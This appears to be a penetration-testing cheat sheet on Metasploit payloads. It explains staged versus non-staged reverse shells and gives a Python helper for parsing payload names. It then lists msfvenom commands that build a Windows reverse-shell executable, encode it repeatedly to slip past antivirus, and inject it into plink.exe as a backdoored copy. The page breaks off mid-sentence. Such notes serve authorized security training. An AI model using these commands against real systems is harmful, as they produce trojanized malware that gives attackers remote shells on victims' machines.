Payloads

Staged vs. Non-staged Payloads

Try staged payloads first, but fall back to non-staged payloads if the staged ones don't work.

A non-staged payload is sent in its entirety along with the exploit. For example:

windows/x64/meterpreter_reverse_tcp

In contrast, a staged payload is usually delivered in two parts. The first part is a small primary payload (the stager) that makes the victim machine connect back to the attacker, download a larger secondary payload (the stage) containing the rest of the shellcode, and then execute it. For example:

windows/x64/meterpreter/reverse_tcp

Use staged payloads when:

  1. The vulnerability we are exploiting does not have enough buffer space to hold a full payload.

  2. Antivirus software blocks the non-staged payload.
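The naming convention behind the two examples above (stage/stager for staged, stage_stager for non-staged) is easy to mis-read in logs and module listings. The following is an added example, not code from the page or from the Metasploit project: it parses a payload path, reports whether it is staged, and derives the counterpart name. The architecture and stager lists are assumptions kept short for the example.

```python
from dataclasses import dataclass
from typing import Optional

# Assumed lists for the example: Metasploit ships many more architectures
# and stagers than these; extend them for the modules you actually see.
KNOWN_ARCHS = ("x64", "x86")
KNOWN_STAGERS = ("reverse_tcp", "reverse_http", "reverse_https", "bind_tcp")

@dataclass(frozen=True)
class PayloadName:
    platform: str
    arch: Optional[str]
    stage: str        # e.g. "meterpreter" or "shell"
    stager: str       # e.g. "reverse_tcp"
    staged: bool      # True for stage/stager, False for stage_stager

def parse_payload(name: str) -> PayloadName:
    """Split a Metasploit payload path and decide whether it is staged."""
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = None
    if rest and rest[0] in KNOWN_ARCHS:
        arch, rest = rest[0], rest[1:]
    # Staged: the stager is its own path component after the stage.
    if len(rest) == 2 and rest[1] in KNOWN_STAGERS:
        return PayloadName(platform, arch, rest[0], rest[1], staged=True)
    # Non-staged: the stager is glued to the stage with an underscore.
    if len(rest) == 1:
        for stager in KNOWN_STAGERS:
            if rest[0].endswith("_" + stager):
                stage = rest[0][: -len(stager) - 1]
                return PayloadName(platform, arch, stage, stager, staged=False)
    raise ValueError(f"unrecognised payload layout: {name!r}")

def counterpart(name: str) -> str:
    """Return the staged name for a non-staged payload and vice versa."""
    p = parse_payload(name)
    prefix = "/".join(x for x in (p.platform, p.arch) if x)
    sep = "_" if p.staged else "/"   # flip the convention
    return f"{prefix}/{p.stage}{sep}{p.stager}"

if __name__ == "__main__":
    for n in ("windows/x64/meterpreter_reverse_tcp",
              "windows/x64/meterpreter/reverse_tcp",
              "windows/shell_reverse_tcp"):
        p = parse_payload(n)
        print(f"{n:40} staged={p.staged!s:5} counterpart={counterpart(n)}")
```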

Executable Payloads

Generate a raw Windows PE reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -o NotAShell.exe

Improve the above payload by encoding it for 9 iterations (the x86 encoder matches the 32-bit windows/shell_reverse_tcp payload):

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o NotAShell.exe

Further improve the above payload by injecting it into an existing PE file (this produces a backdoored copy of the host executable):

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o NotAShell.exe

The same payload generation can also be done inside msfconsole with the generate command:
